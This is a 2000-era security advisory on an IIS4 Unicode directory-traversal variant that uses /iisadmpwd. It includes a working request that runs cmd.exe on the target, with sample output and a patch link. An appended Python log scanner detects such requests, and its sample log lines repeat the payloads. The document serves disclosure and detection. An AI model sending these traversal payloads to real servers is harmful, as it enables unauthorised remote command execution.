===[ www.sinsecurity.net ]===

====[ Information ]======
Program Name   : Microsoft Internet Information Server (IIS)
Program Author : http://www.microsoft.com/iis
Test Versions  : 4, others not vulnerable
Advisory Author: Niels Teusink, a.k.a. Nu Omega Tau
Contact        : [EMAIL PROTECTED]
=========================
This advisory was made in Holland.

Overview
========
Extended Unicode is an exploit found in October 2000 by an unknown person; rfp did further research on this. Later on, variants were found, such as using the /msadc directory instead of /scripts and using different ways of Unicode encoding. All these techniques had their pros and cons: the /scripts method worked on both IIS4 and IIS5, but didn't work if the wwwroot directory was on a different partition than the winnt directory. The /msadc method solved this, as the /msadc directory is in \program files, which is usually on the same partition as the winnt directory; the /msadc method, though, doesn't work with IIS5.

Both of the methods still had a common flaw: the name of the winnt directory must be known for the exploit to work. With my new method, this isn't the case. My method only works with IIS4, though.

For more information on the vulnerability, do a search in the bugtraq archives on www.securityfocus.com with the keyword "Unicode". RainForestPuppy's research can be found at www.wiretrip.net.

Problem Description
===================
When using /iisadmpwd, which is a subdirectory of the Windows NT directory, it is not necessary to specify the Windows NT directory. We can just do

  http://target.machine/iisadmpwd/..%c0%af../cmd.exe?/c+dir

As you can see, I don't specify any directory, but get back:

  Directory of C:\WINDOWS\System32\inetsrv\iisadmpwd

  01/01/00  11:11a        <DIR>          .
  01/01/00  11:11a        <DIR>          ..
  01/01/00  11:11p                 1,902 achg.htr
  (...)

I can imagine admins scanning their network with home-made scripts for vulnerabilities and only fixing machines where the vulnerabilities are found.
When the installation directory is not winnt, the vulnerability would not be detected by such a scan, but it can still be exploited if the machine isn't patched.

Solution
========
This is not a new problem and DOES NOT require a new patch. If you haven't applied the Unicode patch yet because the technique didn't work on your system, it may be a good idea to do so now. The patch can be found at

  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23667

Although this is not a new problem, I decided to inform Microsoft of this method before posting this.

===[ Niels Teusink - Sin Security ]===
Don't deface, email!
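Requests like the one in this advisory are easy to miss if a log search only looks for the literal winnt directory or a raw "../". As an added example, not part of the advisory, the Python below percent-decodes each logged request, collapses overlong UTF-8 sequences such as %c0%af back to the separator they disguise, and flags any request whose decoded path climbs above the web root; the log layout and the sample lines are constructed assumptions, not real IIS output.

```python
from urllib.parse import unquote_to_bytes

def decode_overlong(data: bytes) -> bytes:
    # Collapse 2-byte overlong UTF-8 (lead byte 0xC0/0xC1) into the ASCII
    # byte it disguises, e.g. %c0%af -> '/', which IIS accepted as a separator.
    out, i = bytearray(), 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return bytes(out)

def escapes_web_root(path: str) -> bool:
    # True if the decoded path climbs above the web root at any point;
    # a ".." that stays inside the root (e.g. /docs/../index.htm) is benign.
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False

# Constructed sample log, assumed W3C-extended-like layout:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2000-11-01 11:11:00 10.0.0.5 GET /default.asp - 200
2000-11-01 11:11:02 10.0.0.7 GET /docs/../index.htm - 200
2000-11-01 11:11:05 10.0.0.9 GET /iisadmpwd/..%c0%af../cmd.exe /c+dir 200
2000-11-01 11:11:07 10.0.0.9 GET /iisadmpwd/..%c1%9c../cmd.exe /c+dir 200
"""

def find_traversal(log_text: str) -> list:
    # Return (client ip, raw uri, decoded uri) for each request escaping the root.
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue  # skip malformed or truncated lines
        # Percent-decode, collapse overlong sequences, unify '\' to '/'.
        decoded = decode_overlong(unquote_to_bytes(fields[4])).decode("latin-1").replace("\\", "/")
        if escapes_web_root(decoded):
            hits.append((fields[2], fields[4], decoded))
    return hits
```

Because the check runs on the decoded path, it does not depend on the installation directory name, which is exactly what a literal search for winnt would miss.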